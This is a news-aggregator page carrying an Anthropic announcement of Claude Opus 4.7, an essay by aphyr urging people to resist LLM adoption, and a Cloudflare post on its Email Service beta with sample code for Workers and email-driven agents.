10 interesting stories served every morning and every evening.




1 1,631 shares, 84 trendiness

Introducing Claude Opus 4.7

Our lat­est model, Claude Opus 4.7, is now gen­er­ally avail­able. Opus 4.7 is a no­table im­prove­ment on Opus 4.6 in ad­vanced soft­ware en­gi­neer­ing, with par­tic­u­lar gains on the most dif­fi­cult tasks. Users re­port be­ing able to hand off their hard­est cod­ing work—the kind that pre­vi­ously needed close su­per­vi­sion—to Opus 4.7 with con­fi­dence. Opus 4.7 han­dles com­plex, long-run­ning tasks with rigor and con­sis­tency, pays pre­cise at­ten­tion to in­struc­tions, and de­vises ways to ver­ify its own out­puts be­fore re­port­ing back.The model also has sub­stan­tially bet­ter vi­sion: it can see im­ages in greater res­o­lu­tion. It’s more taste­ful and cre­ative when com­plet­ing pro­fes­sional tasks, pro­duc­ing higher-qual­ity in­ter­faces, slides, and docs. And—although it is less broadly ca­pa­ble than our most pow­er­ful model, Claude Mythos Preview—it shows bet­ter re­sults than Opus 4.6 across a range of bench­marks:Last week we an­nounced Project Glasswing, high­light­ing the risks—and ben­e­fits—of AI mod­els for cy­ber­se­cu­rity. We stated that we would keep Claude Mythos Preview’s re­lease lim­ited and test new cy­ber safe­guards on less ca­pa­ble mod­els first. Opus 4.7 is the first such model: its cy­ber ca­pa­bil­i­ties are not as ad­vanced as those of Mythos Preview (indeed, dur­ing its train­ing we ex­per­i­mented with ef­forts to dif­fer­en­tially re­duce these ca­pa­bil­i­ties). We are re­leas­ing Opus 4.7 with safe­guards that au­to­mat­i­cally de­tect and block re­quests that in­di­cate pro­hib­ited or high-risk cy­ber­se­cu­rity uses. What we learn from the real-world de­ploy­ment of these safe­guards will help us work to­wards our even­tual goal of a broad re­lease of Mythos-class mod­els.Se­cu­rity pro­fes­sion­als who wish to use Opus 4.7 for le­git­i­mate cy­ber­se­cu­rity pur­poses (such as vul­ner­a­bil­ity re­search, pen­e­tra­tion test­ing, and red-team­ing) are in­vited to join our new Cyber Verification Program.Opus 4.7 is avail­able to­day across all Claude prod­ucts and our API, Amazon Bedrock, Google Cloud’s Vertex AI, and Microsoft Foundry. Pricing re­mains the same as Opus 4.6: $5 per mil­lion in­put to­kens and $25 per mil­lion out­put to­kens. Developers can use claude-opus-4-7 via the Claude API.Claude Opus 4.7 has gar­nered strong feed­back from our early-ac­cess testers:In early test­ing, we’re see­ing the po­ten­tial for a sig­nif­i­cant leap for our de­vel­op­ers with Claude Opus 4.7. It catches its own log­i­cal faults dur­ing the plan­ning phase and ac­cel­er­ates ex­e­cu­tion, far be­yond pre­vi­ous Claude mod­els. As a fi­nan­cial tech­nol­ogy plat­form serv­ing mil­lions of con­sumers and busi­nesses at sig­nif­i­cant scale, this com­bi­na­tion of speed and pre­ci­sion could be game-chang­ing: ac­cel­er­at­ing de­vel­op­ment ve­loc­ity for faster de­liv­ery of the trusted fi­nan­cial so­lu­tions our cus­tomers rely on every day.An­thropic has al­ready set the stan­dard for cod­ing mod­els, and Claude Opus 4.7 pushes that fur­ther in a mean­ing­ful way as the state-of-the-art model on the mar­ket. In our in­ter­nal evals, it stands out not just for raw ca­pa­bil­ity, but for how well it han­dles real-world async work­flows—au­toma­tions, CI/CD, and long-run­ning tasks. It also thinks more deeply about prob­lems and brings a more opin­ion­ated per­spec­tive, rather than sim­ply agree­ing with the user.Claude Opus 4.7 is the strongest model Hex has eval­u­ated. It cor­rectly re­ports when data is miss­ing in­stead of pro­vid­ing plau­si­ble-but-in­cor­rect fall­backs, and it re­sists dis­so­nant-data traps that even Opus 4.6 falls for. It’s a more in­tel­li­gent, more ef­fi­cient Opus 4.6: low-ef­fort Opus 4.7 is roughly equiv­a­lent to medium-ef­fort Opus 4.6.On our 93-task cod­ing bench­mark, Claude Opus 4.7 lifted res­o­lu­tion by 13% over Opus 4.6, in­clud­ing four tasks nei­ther Opus 4.6 nor Sonnet 4.6 could solve. Combined with faster me­dian la­tency and strict in­struc­tion fol­low­ing, it’s par­tic­u­larly mean­ing­ful for com­plex, long-run­ning cod­ing work­flows. It cuts the fric­tion from those multi-step tasks so de­vel­op­ers can stay in the flow and fo­cus on build­ing.Based on our in­ter­nal re­search-agent bench­mark, Claude Opus 4.7 has the strongest ef­fi­ciency base­line we’ve seen for multi-step work. It tied for the top over­all score across our six mod­ules at 0.715 and de­liv­ered the most con­sis­tent long-con­text per­for­mance of any model we tested. On General Finance—our largest mod­ule—it im­proved mean­ing­fully on Opus 4.6, scor­ing 0.813 ver­sus 0.767, while also show­ing the best dis­clo­sure and data dis­ci­pline in the group. And on de­duc­tive logic, an area where Opus 4.6 strug­gled, Opus 4.7 is solid.Claude Opus 4.7 ex­tends the limit of what mod­els can do to in­ves­ti­gate and get tasks done. Anthropic has clearly op­ti­mized for sus­tained rea­son­ing over long runs, and it shows with mar­ket-lead­ing per­for­mance. As en­gi­neers shift from work­ing 1:1 with agents to man­ag­ing them in par­al­lel, this is ex­actly the kind of fron­tier ca­pa­bil­ity that un­locks new work­flows.We’re see­ing ma­jor im­prove­ments in Claude Opus 4.7’s mul­ti­modal un­der­stand­ing, from read­ing chem­i­cal struc­tures to in­ter­pret­ing com­plex tech­ni­cal di­a­grams. The higher res­o­lu­tion sup­port is help­ing Solve Intelligence build best-in-class tools for life sci­ences patent work­flows, from draft­ing and pros­e­cu­tion to in­fringe­ment de­tec­tion and in­va­lid­ity chart­ing.Claude Opus 4.7 takes long-hori­zon au­ton­omy to a new level in Devin. It works co­her­ently for hours, pushes through hard prob­lems rather than giv­ing up, and un­locks a class of deep in­ves­ti­ga­tion work we could­n’t re­li­ably run be­fore.For Replit, Claude Opus 4.7 was an easy up­grade de­ci­sion. For the work our users do every day, we ob­served it achiev­ing the same qual­ity at lower cost—more ef­fi­cient and pre­cise at tasks like an­a­lyz­ing logs and traces, find­ing bugs, and propos­ing fixes. Personally, I love how it pushes back dur­ing tech­ni­cal dis­cus­sions to help me make bet­ter de­ci­sions. It re­ally feels like a bet­ter coworker.Claude Opus 4.7 demon­strates strong sub­stan­tive ac­cu­racy on BigLaw Bench for Harvey, scor­ing 90.9% at high ef­fort with bet­ter rea­son­ing cal­i­bra­tion on re­view ta­bles and no­tice­ably smarter han­dling of am­bigu­ous doc­u­ment edit­ing tasks. It cor­rectly dis­tin­guishes as­sign­ment pro­vi­sions from change-of-con­trol pro­vi­sions, a task that has his­tor­i­cally chal­lenged fron­tier mod­els. Substance was con­sis­tently rated as a strength across our eval­u­a­tions: cor­rect, thor­ough, and well-cited.Claude Opus 4.7 is a very im­pres­sive cod­ing model, par­tic­u­larly for its au­ton­omy and more cre­ative rea­son­ing. On CursorBench, Opus 4.7 is a mean­ing­ful jump in ca­pa­bil­i­ties, clear­ing 70% ver­sus Opus 4.6 at 58%.For com­plex multi-step work­flows, Claude Opus 4.7 is a clear step up: plus 14% over Opus 4.6 at fewer to­kens and a third of the tool er­rors. It’s the first model to pass our im­plicit-need tests, and it keeps ex­e­cut­ing through tool fail­ures that used to stop Opus cold. This is the re­li­a­bil­ity jump that makes Notion Agent feel like a true team­mate.In our evals, we saw a dou­ble-digit jump in ac­cu­racy of tool calls and plan­ning in our core or­ches­tra­tor agents. As users lever­age Hebbia to plan and ex­e­cute on use cases like re­trieval, slide cre­ation, or doc­u­ment gen­er­a­tion, Claude Opus 4.7 shows the po­ten­tial to im­prove agent de­ci­sion-mak­ing in these work­flows.On Rakuten-SWE-Bench, Claude Opus 4.7 re­solves 3x more pro­duc­tion tasks than Opus 4.6, with dou­ble-digit gains in Code Quality and Test Quality. This is a mean­ing­ful lift and a clear up­grade for the en­gi­neer­ing work our teams are ship­ping every day.For CodeRabbit’s code re­view work­loads, Claude Opus 4.7 is the sharpest model we’ve tested. Recall im­proved by over 10%, sur­fac­ing some of the most dif­fi­cult-to-de­tect bugs in our most com­plex PRs, while pre­ci­sion re­mained sta­ble de­spite the in­creased cov­er­age. It’s a bit faster than GPT-5.4 xhigh on our har­ness, and we’re lin­ing it up for our heav­i­est re­view work at launch.For Genspark’s Super Agent, Claude Opus 4.7 nails the three pro­duc­tion dif­fer­en­tia­tors that mat­ter most: loop re­sis­tance, con­sis­tency, and grace­ful er­ror re­cov­ery. Loop re­sis­tance is the most crit­i­cal. A model that loops in­def­i­nitely on 1 in 18 queries wastes com­pute and blocks users. Lower vari­ance means fewer sur­prises in prod. And Opus 4.7 achieves the high­est qual­ity-per-tool-call ra­tio we’ve mea­sured.Claude Opus 4.7 is a mean­ing­ful step up for Warp. Opus 4.6 is one of the best mod­els out there for de­vel­op­ers, and this model is mea­sur­ably more thor­ough on top of that. It passed Terminal Bench tasks that prior Claude mod­els had failed, and worked through a tricky con­cur­rency bug Opus 4.6 could­n’t crack. For us, that’s the sig­nal.Claude Opus 4.7 is the best model in the world for build­ing dash­boards and data-rich in­ter­faces. The de­sign taste is gen­uinely sur­pris­ing—it makes choices I’d ac­tu­ally ship. It’s my de­fault daily dri­ver now.Claude Opus 4.7 is the most ca­pa­ble model we’ve tested at Quantium. Evaluated against lead­ing AI mod­els through our pro­pri­etary bench­mark­ing so­lu­tion, the biggest gains showed up where they mat­ter most: rea­son­ing depth, struc­tured prob­lem-fram­ing, and com­plex tech­ni­cal work. Fewer cor­rec­tions, faster it­er­a­tions, and stronger out­puts to solve the hard­est prob­lems our clients bring us.Claude Opus 4.7 feels like a real step up in in­tel­li­gence. Code qual­ity is no­tice­ably im­proved, it’s cut­ting out the mean­ing­less wrap­per func­tions and fall­back scaf­fold­ing that used to pile up, and fixes its own code as it goes. It’s the clean­est jump we’ve seen since the move from Sonnet 3.7 to the Claude 4 se­ries.For the com­puter-use work that sits at the heart of XBOWs au­tonomous pen­e­tra­tion test­ing, the new Claude Opus 4.7 is a step change: 98.5% on our vi­sual-acu­ity bench­mark ver­sus 54.5% for Opus 4.6. Our sin­gle biggest Opus pain point ef­fec­tively dis­ap­peared, and that un­locks its use for a whole class of work where we could­n’t use it be­fore.Claude Opus 4.7 is a solid up­grade with no re­gres­sions for Vercel. It’s phe­nom­e­nal on one-shot cod­ing tasks, more cor­rect and com­plete than Opus 4.6, and no­tice­ably more hon­est about its own lim­its. It even does proofs on sys­tems code be­fore start­ing work, which is new be­hav­ior we haven’t seen from ear­lier Claude mod­els.Claude Opus 4.7 is very strong and out­per­forms Opus 4.6 with a 10% to 15% lift in task suc­cess for Factory Droids, with fewer tool er­rors and more re­li­able fol­low-through on val­i­da­tion steps. It car­ries work all the way through in­stead of stop­ping halfway, which is ex­actly what en­ter­prise en­gi­neer­ing teams need.Claude Opus 4.7 au­tonomously built a com­plete Rust text-to-speech en­gine from scratch—neural model, SIMD ker­nels, browser demo—then fed its own out­put through a speech rec­og­nizer to ver­ify it matched the Python ref­er­ence. Months of se­nior en­gi­neer­ing, de­liv­ered au­tonomously. The step up from Opus 4.6 is clear, and the code­base is pub­lic.Claude Opus 4.7 passed three TBench tasks that prior Claude mod­els could­n’t, and it’s land­ing fixes our pre­vi­ous best model missed, in­clud­ing a race con­di­tion. It demon­strates strong pre­ci­sion in iden­ti­fy­ing real is­sues, and sur­faces im­por­tant find­ings that other mod­els ei­ther gave up on or did­n’t re­solve. In Qodo’s real-world code re­view bench­mark, we ob­served top-tier pre­ci­sion.On Databricks’ OfficeQA Pro, Claude Opus 4.7 shows mean­ing­fully stronger doc­u­ment rea­son­ing, with 21% fewer er­rors than Opus 4.6 when work­ing with source in­for­ma­tion. Across our agen­tic rea­son­ing over data bench­marks, it is the best-per­form­ing Claude model for en­ter­prise doc­u­ment analy­sis.For Ramp, Claude Opus 4.7 stands out in agent-team work­flows. We’re see­ing stronger role fi­delity, in­struc­tion-fol­low­ing, co­or­di­na­tion, and com­plex rea­son­ing, es­pe­cially on en­gi­neer­ing tasks that span tools, code­bases, and de­bug­ging con­text. Compared with Opus 4.6, it needs much less step-by-step guid­ance, help­ing us scale the in­ter­nal agent work­flows our en­gi­neer­ing teams run.Claude Opus 4.7 is mea­sur­ably bet­ter than Opus 4.6 for Bolt’s longer-run­ning app-build­ing work, up to 10% bet­ter in the best cases, with­out the re­gres­sions we’ve come to ex­pect from very agen­tic mod­els. It pushes the ceil­ing on what our users can ship in a sin­gle ses­sion.Be­low are some high­lights and notes from our early test­ing of Opus 4.7:Instruction fol­low­ing. Opus 4.7 is sub­stan­tially bet­ter at fol­low­ing in­struc­tions. Interestingly, this means that prompts writ­ten for ear­lier mod­els can some­times now pro­duce un­ex­pected re­sults: where pre­vi­ous mod­els in­ter­preted in­struc­tions loosely or skipped parts en­tirely, Opus 4.7 takes the in­struc­tions lit­er­ally. Users should re-tune their prompts and har­nesses ac­cord­ingly.Im­proved mul­ti­modal sup­port. Opus 4.7 has bet­ter vi­sion for high-res­o­lu­tion im­ages: it can ac­cept im­ages up to 2,576 pix­els on the long edge (~3.75 megapix­els), more than three times as many as prior Claude mod­els. This opens up a wealth of mul­ti­modal uses that de­pend on fine vi­sual de­tail: com­puter-use agents read­ing dense screen­shots, data ex­trac­tions from com­plex di­a­grams, and work that needs pixel-per­fect ref­er­ences.1Real-world work. As well as its state-of-the-art score on the Finance Agent eval­u­a­tion (see table above), our in­ter­nal test­ing showed Opus 4.7 to be a more ef­fec­tive fi­nance an­a­lyst than Opus 4.6, pro­duc­ing rig­or­ous analy­ses and mod­els, more pro­fes­sional pre­sen­ta­tions, and tighter in­te­gra­tion across tasks. Opus 4.7 is also state-of-the-art on GDPval-AA, a third-party eval­u­a­tion of eco­nom­i­cally valu­able knowl­edge work across fi­nance, le­gal, and other do­mains.Mem­ory. Opus 4.7 is bet­ter at us­ing file sys­tem-based mem­ory. It re­mem­bers im­por­tant notes across long, multi-ses­sion work, and uses them to move on to new tasks that, as a re­sult, need less up-front con­text.The charts be­low dis­play more eval­u­a­tion re­sults from our pre-re­lease test­ing, across a range of dif­fer­ent do­mains:Over­all, Opus 4.7 shows a sim­i­lar safety pro­file to Opus 4.6: our eval­u­a­tions show low rates of con­cern­ing be­hav­ior such as de­cep­tion, syco­phancy, and co­op­er­a­tion with mis­use. On some mea­sures, such as hon­esty and re­sis­tance to ma­li­cious prompt in­jec­tion” at­tacks, Opus 4.7 is an im­prove­ment on Opus 4.6; in oth­ers (such as its ten­dency to give overly de­tailed harm-re­duc­tion ad­vice on con­trolled sub­stances), Opus 4.7 is mod­estly weaker. Our align­ment as­sess­ment con­cluded that the model is largely well-aligned and trust­wor­thy, though not fully ideal in its be­hav­ior”. Note that Mythos Preview re­mains the best-aligned model we’ve trained ac­cord­ing to our eval­u­a­tions. Our safety eval­u­a­tions are dis­cussed in full in the Claude Opus 4.7 System Card.Overall mis­aligned be­hav­ior score from our au­to­mated be­hav­ioral au­dit. On this eval­u­a­tion, Opus 4.7 is a mod­est im­prove­ment on Opus 4.6 and Sonnet 4.6, but Mythos Preview still shows the low­est rates of mis­aligned be­hav­ior.In ad­di­tion to Claude Opus 4.7 it­self, we’re launch­ing the fol­low­ing up­dates:More ef­fort con­trol: Opus 4.7 in­tro­duces a new xhigh (“extra high”) ef­fort level be­tween high and max, giv­ing users finer con­trol over the trade­off be­tween rea­son­ing and la­tency on hard prob­lems. In Claude Code, we’ve raised the de­fault ef­fort level to xhigh for all plans. When test­ing Opus 4.7 for cod­ing and agen­tic use cases, we rec­om­mend start­ing with high or xhigh ef­fort.On the Claude Platform (API): as well as sup­port for higher-res­o­lu­tion im­ages, we’re also launch­ing task bud­gets in pub­lic beta, giv­ing de­vel­op­ers a way to guide Claude’s to­ken spend so it can pri­or­i­tize work across longer runs.In Claude Code: The new /ultrareview slash com­mand pro­duces a ded­i­cated re­view ses­sion that reads through changes and flags bugs and de­sign is­sues that a care­ful re­viewer would catch. We’re giv­ing Pro and Max Claude Code users three free ul­tra­reviews to try it out. In ad­di­tion, we’ve ex­tended auto mode to Max users. Auto mode is a new per­mis­sions op­tion where Claude makes de­ci­sions on your be­half, mean­ing that you can run longer tasks with fewer in­ter­rup­tions—and with less risk than if you had cho­sen to skip all per­mis­sions.Opus 4.7 is a di­rect up­grade to Opus 4.6, but two changes are worth plan­ning for be­cause they af­fect to­ken us­age. First, Opus 4.7 uses an up­dated to­k­enizer that im­proves how the model processes text. The trade­off is that the same in­put can map to more to­kens—roughly 1.0–1.35× de­pend­ing on the con­tent type. Second, Opus 4.7 thinks more at higher ef­fort lev­els, par­tic­u­larly on later turns in agen­tic set­tings. This im­proves its re­li­a­bil­ity on hard prob­lems, but it does mean it pro­duces more out­put to­kens. Users can con­trol to­ken us­age in var­i­ous ways: by us­ing the ef­fort pa­ra­me­ter, ad­just­ing their task bud­gets, or prompt­ing the model to be more con­cise. In our own test­ing, the net ef­fect is fa­vor­able—to­ken us­age across all ef­fort lev­els is im­proved on an in­ter­nal cod­ing eval­u­a­tion, as shown be­low—but we rec­om­mend mea­sur­ing the dif­fer­ence on real traf­fic. We’ve writ­ten a mi­gra­tion guide that pro­vides fur­ther ad­vice on up­grad­ing from Opus 4.6 to Opus 4.7.Score on an in­ter­nal agen­tic cod­ing eval­u­a­tion as a func­tion of to­ken us­age at each ef­fort level. In this eval­u­a­tion, the model works au­tonomously from a sin­gle user prompt, and re­sults may not be rep­re­sen­ta­tive of to­ken us­age in in­ter­ac­tive cod­ing. See the mi­gra­tion guide for more on tun­ing ef­fort lev­els.

...

Read the original on www.anthropic.com »

2 1,012 shares, 50 trendiness

Qwen Studio

...

Read the original on qwen.ai »

3 569 shares, 29 trendiness

The Future of Everything is Lies, I Guess

Some read­ers are un­doubt­edly up­set that I have not de­voted more space to the won­ders of ma­chine learn­ing—how amaz­ing LLMs are at code gen­er­a­tion, how in­cred­i­ble it is that Suno can turn hummed melodies into pol­ished songs. But this is not an ar­ti­cle about how fast or con­ve­nient it is to drive a car. We all know cars are fast. I am try­ing to ask what will hap­pen to the shape of

cities.

The per­sonal au­to­mo­bile re­shaped

streets, all but ex­tin­guished ur­ban horses and their

waste,

sup­planted lo­cal

tran­sit

and in­terur­ban rail­ways, ger­mi­nated new build­ing

ty­polo­gies,

de­cen­tral­ized

cities, cre­ated ex­ur­ban

sprawl,

re­duced in­ci­den­tal so­cial

con­tact, gave rise to the Interstate Highway

System (bulldozing

Black

com­mu­ni­ties

in the process), gave every­one lead

poi­son­ing, and be­came a lead­ing

cause of death

among young peo­ple. Many parts of the US are highly

car-de­pen­dent, even though a

third of us don’t

drive. As a dri­ver, cy­clist, tran­sit rider, and pedes­trian, I think about this legacy every day: how so much of our lives are shaped by the tech­nol­ogy of per­sonal au­to­mo­biles, and the spe­cific way the US uses them.

I want you to think about AI in this sense.

Some of our pos­si­ble fu­tures are grim, but man­age­able. Others are down­right ter­ri­fy­ing, in which large num­bers of peo­ple lose their homes, health, or lives. I don’t have a strong sense of what will hap­pen, but the space of pos­si­ble fu­tures feels much broader in 2026 than it did in 2022, and most of those fu­tures feel bad.

Much of the bull­shit fu­ture is al­ready here, and I am pro­foundly tired of it. There is slop in my search re­sults, at the gym, at the doc­tor’s of­fice. Customer ser­vice, con­trac­tors, and en­gi­neers use LLMs to blindly lie to me. The elec­tric com­pany has hiked our rates and says data cen­ters are to blame. LLM scrap­ers take down the web sites I run and make it harder to ac­cess the ser­vices I rely on. I watch syn­thetic videos of suf­fer­ing an­i­mals and stare at gen­er­ated web pages which lie about po­lice bru­tal­ity. There is LLM spam in my in­box and syn­thetic CSAM on my mod­er­a­tion dash­board. I watch peo­ple out­source their work, food, travel, art, even re­la­tion­ships to ChatGPT. I read chat­bots lin­ing the delu­sional war­rens of men­tal health crises.

I am asked to an­a­lyze va­por­ware and to dis­prove non­sen­si­cal claims. I wade through vo­lu­mi­nous LLM-generated pull re­quests. Prospective clients ask Claude to do the work they might have hired me for. Thankfully Claude’s code is bad, but that could change, and that scares me. I worry about los­ing my home. I could re­train, but my core skills—read­ing, think­ing, and writ­ing—are squarely in the blast ra­dius of large lan­guage mod­els. I imag­ine go­ing to school to be­come an ar­chi­tect, just to watch ML eat that field too.

It is deeply alien­at­ing to see so many of my peers wildly en­thu­si­as­tic about MLs po­ten­tial ap­pli­ca­tions, and us­ing it per­son­ally. Governments and in­dus­try seem all-in on AI, and I worry that by do­ing so, we’re has­ten­ing the ar­rival of un­pre­dictable but po­ten­tially dev­as­tat­ing con­se­quences—per­sonal, cul­tural, eco­nomic, and hu­man­i­tar­ian.

I’ve thought about this a lot over the last few years, and I think the best

re­sponse is to stop. ML as­sis­tance re­duces our per­for­mance and

per­sis­tence, and de­nies us both the mus­cle mem­ory and deep the­ory-build­ing that comes with work­ing through a task by hand: the cul­ti­va­tion of what James C. Scott would

call

metis. I have never used an LLM for my writ­ing, soft­ware, or per­sonal life, be­cause I care about my abil­ity to write well, rea­son deeply, and stay grounded in the world. If I ever adopt ML tools in more than an ex­ploratory ca­pac­ity, I will need to take great care. I also try to min­i­mize what I con­sume from LLMs. I read cook­books writ­ten by hu­man be­ings, I trawl through uni­ver­sity web­sites to iden­tify wildlife, and I talk through my prob­lems with friends.

I think you should do the same.

Refuse to in­sult your read­ers: think your own thoughts and write your own words. Call out

peo­ple

who send you slop. Flag ML haz­ards at work and with friends. Stop pay­ing for ChatGPT at home, and con­vince your com­pany not to sign a deal for Gemini. Form or join a la­bor union, and push back against man­age­ment de­mands that you adopt

Copilot—after all, it’s for en­ter­tain­ment pur­poses

only. Call your mem­bers of Congress and de­mand ag­gres­sive reg­u­la­tion which holds ML com­pa­nies re­spon­si­ble for their

car­bon

and

dig­i­tal

emis­sions. Advocate against tax breaks for ML

dat­a­cen­ters. If you work at Anthropic, xAI, etc., you should think se­ri­ously about your

role in mak­ing the

fu­ture. To be frank, I think you should quit your

job.

I don’t think this will stop ML from ad­vanc­ing al­to­gether: there are still lots of peo­ple who want to make it hap­pen. It will, how­ever, slow them down, and this is good. Today’s mod­els are al­ready very ca­pa­ble. It will take time for the ef­fects of the ex­ist­ing tech­nol­ogy to be fully felt, and for cul­ture, in­dus­try, and gov­ern­ment to adapt. Each day we de­lay the ad­vance­ment of ML mod­els buys time to learn how to man­age tech­ni­cal debt and er­rors in­tro­duced in le­gal fil­ings. Another day to pre­pare for ML-generated CSAM, so­phis­ti­cated fraud, ob­scure soft­ware vul­ner­a­bil­i­ties, and AI Barbie. Another day for work­ers to find new jobs.

Staving off ML will also as­suage your con­science over the com­ing decades. As some­one who once quit an oth­er­wise good job on eth­i­cal grounds, I feel good about that de­ci­sion. I think you will too.

And if I’m wrong, we can al­ways build it later.

Despite feel­ing a bit­ter dis­taste for this gen­er­a­tion of ML sys­tems and the peo­ple who brought them into ex­is­tence, they do seem use­ful. I want to use them. I prob­a­bly will at some point.

For ex­am­ple, I’ve got these color-chang­ing lights. They speak a pro­to­col I’ve never heard of, and I have no idea where to even be­gin. I could spend a month dig­ging through man­u­als and work­ing it out from scratch—or I could ask an LLM to write a client li­brary for me. The se­cu­rity con­se­quences are min­i­mal, it’s a con­strained use case that I can ver­ify by hand, and I would­n’t be push­ing tech debt on any­one else. I still write plenty of code, and I could stop any time. What would be the harm?

Many friends con­tributed dis­cus­sion, read­ing ma­te­r­ial, and feed­back on this ar­ti­cle. My heart­felt thanks to Peter Alvaro, Kevin Amidon, André Arko, Taber Bain, Silvia Botros, Daniel Espeset, Julia Evans, Brad Greenlee, Coda Hale, Marc Hedlund, Sarah Huffman, Dan Mess, Nelson Minar, Alex Rasmussen, Harper Reed, Daliah Saper, Peter Seibel, Rhys Seiffe, and James Turnbull.

This piece, like most all my words and soft­ware, was writ­ten by hand—mainly in Vim. I com­posed a Markdown out­line in a mix of head­ers, bul­let points, and prose, then re­or­ga­nized it in a few passes. With the struc­ture laid out, I rewrote the out­line as prose, type­set with Pandoc. I went back to make sub­stan­tial ed­its as I wrote, then made two full edit passes on type­set PDFs. For the first I used an iPad and sty­lus, for the sec­ond, the tra­di­tional pen and pa­per, read aloud.

I cir­cu­lated the re­sult­ing draft among friends for their feed­back be­fore pub­li­ca­tion. Incisive ideas and de­light­ful turns of phrase may be at­trib­uted to them; any er­rors or ob­jec­tion­able view­points are, of course, mine alone.

...

Read the original on aphyr.com »

4 434 shares, 24 trendiness

Cloudflare Email Service now in public beta

Email is the most ac­ces­si­ble in­ter­face in the world. It is ubiq­ui­tous. There’s no need for a cus­tom chat ap­pli­ca­tion, no cus­tom SDK for each chan­nel. Everyone al­ready has an email ad­dress, which means every­one can al­ready in­ter­act with your ap­pli­ca­tion or agent. And your agent can in­ter­act with any­one.

If you are build­ing an ap­pli­ca­tion, you al­ready rely on email for signups, no­ti­fi­ca­tions, and in­voices. Increasingly, it is not just your ap­pli­ca­tion logic that needs this chan­nel. Your agents do, too. During our pri­vate beta, we talked to de­vel­op­ers who are build­ing ex­actly this: cus­tomer sup­port agents, in­voice pro­cess­ing pipelines, ac­count ver­i­fi­ca­tion flows, multi-agent work­flows. All built on top of email. The pat­tern is clear: email is be­com­ing a core in­ter­face for agents, and de­vel­op­ers need in­fra­struc­ture pur­pose-built for it.

Cloudflare Email Service is that piece. With Email Routing, you can re­ceive email to your ap­pli­ca­tion or agent. With Email Sending, you can re­ply to emails or send out­bounds to no­tify your users when your agents are done do­ing work. And with the rest of the de­vel­oper plat­form, you can build a full email client and Agents SDK onE­mail hook as na­tive func­tion­al­ity.

Today, as part of Agents Week, Cloudflare Email Service is en­ter­ing pub­lic beta, al­low­ing any ap­pli­ca­tion and any agent to send emails. We are also com­plet­ing the toolkit for build­ing email-na­tive agents:

Email Sending bind­ing, avail­able from your Workers and the Agents SDK

Email Sending grad­u­ates from pri­vate beta to pub­lic beta to­day. You can now send trans­ac­tional emails di­rectly from Workers with a na­tive Workers bind­ing — no API keys, no se­crets man­age­ment.

ex­port de­fault {

async fetch(re­quest, env, ctx) {

await env. EMAIL.send({

to: [email protected]”,

from: [email protected]”,

sub­ject: Your or­der has shipped”,

text: Your or­der #1234 has shipped and is on its way.”

re­turn new Response(“Email sent”);

Or send from any plat­form, any lan­guage, us­ing the REST API and our TypeScript, Python, and Go SDKs:

–header Content-Type: ap­pli­ca­tion/​json” \

–data {

to”: [email protected]”,

from”: [email protected]”,

subject”: Your or­der has shipped”,

text”: Your or­der #1234 has shipped and is on its way.”

Sending email that ac­tu­ally reaches in­boxes usu­ally means wrestling with SPF, DKIM, and DMARC records. When you add your do­main to Email Service, we con­fig­ure all of it au­to­mat­i­cally. Your emails are au­then­ti­cated and de­liv­ered, not flagged as spam. And be­cause Email Service is a global ser­vice built on Cloudflare’s net­work, your emails are de­liv­ered with low la­tency any­where in the world.

Combined with Email Routing, which has been free and avail­able for years, you now have com­plete bidi­rec­tional email within a sin­gle plat­form. Receive an email, process it in a Worker, and re­ply, all with­out leav­ing Cloudflare.

For the full deep dive on Email Sending, re­fer to our Birthday Week an­nounce­ment. The rest of this post de­scribes what Email Service un­locks for agents.

The Agents SDK for build­ing agents on Cloudflare al­ready has a first-class onE­mail hook for re­ceiv­ing and pro­cess­ing in­bound email. But un­til now, your agent could only re­ply syn­chro­nously, or send emails to mem­bers of your Cloudflare ac­count.

With Email Sending, that con­straint is gone. This is the dif­fer­ence be­tween a chat­bot and an agent.

Email agents re­ceive a mes­sage, or­ches­trate work across the plat­form, and re­spond asyn­chro­nously.

A chat­bot re­sponds in the mo­ment or not at all. An agent thinks, acts, and com­mu­ni­cates on its own time­line. With Email Sending, your agent can re­ceive a mes­sage, spend an hour pro­cess­ing data, check three other sys­tems, and then re­ply with a com­plete an­swer. It can sched­ule fol­low-ups. It can es­ca­late when it de­tects an edge case. It can op­er­ate in­de­pen­dently. In other words: it can ac­tu­ally do work, not just an­swer ques­tions.

Here’s what a sup­port agent looks like with the full pipeline — re­ceive, per­sist, and re­ply:

im­port { Agent, routeAgen­tEmail } from agents”;

im­port { cre­ateAd­dress­BasedE­mail­Re­solver, type AgentEmail } from agents/email”;

im­port PostalMime from postal-mime”;

ex­port class SupportAgent ex­tends Agent {

async onE­mail(email: AgentEmail) {

const raw = await email.ge­tRaw();

const parsed = await PostalMime.parse(raw);

// Persist in agent state

this.set­State({

…this.state,

ticket: { from: email.from, sub­ject: parsed.sub­ject, body: parsed.text, mes­sageId: parsed.mes­sageId },

// Kick off long run­ning back­ground agent task

// Or place a mes­sage on a Queue to be han­dled by an­other Worker

// Reply here or in other Worker han­dler, like a Queue han­dler

await this.sendE­mail({

bind­ing: this.env. EMAIL,

from­Name: Support Agent”,

from: [email protected]”,

to: this.state.ticket.from,

in­Re­plyTo: this.state.ticket.mes­sageId,

sub­ject: `Re: ${this.state.ticket.subject}`,

text: `Thanks for reach­ing out. We re­ceived your mes­sage about ${this.state.ticket.subject}” and will fol­low up shortly.`

ex­port de­fault {

async email(mes­sage, env) {

await routeAgen­tEmail(mes­sage, env, {

re­solver: cre­ateAd­dress­BasedE­mail­Re­solver(“Sup­port­A­gent”),

} sat­is­fies ExportedHandler

If you’re new to the Agents SDKs email ca­pa­bil­i­ties, here’s what’s hap­pen­ing un­der the hood.

Each agent gets its own iden­tity from a sin­gle do­main. The ad­dress-based re­solver routes [email protected] to a support” agent in­stance, [email protected] to a sales” in­stance, and so on. You don’t need to pro­vi­sion sep­a­rate in­boxes — the rout­ing is built into the ad­dress. You can even use sub-ad­dress­ing ([email protected]) to route to dif­fer­ent agent name­spaces and in­stances.

State per­sists across emails. Because agents are backed by Durable Objects, call­ing this.set­State() means your agent re­mem­bers con­ver­sa­tion his­tory, con­tact in­for­ma­tion, and con­text across ses­sions. The in­box be­comes the agen­t’s mem­ory, with­out need­ing a sep­a­rate data­base or vec­tor store.

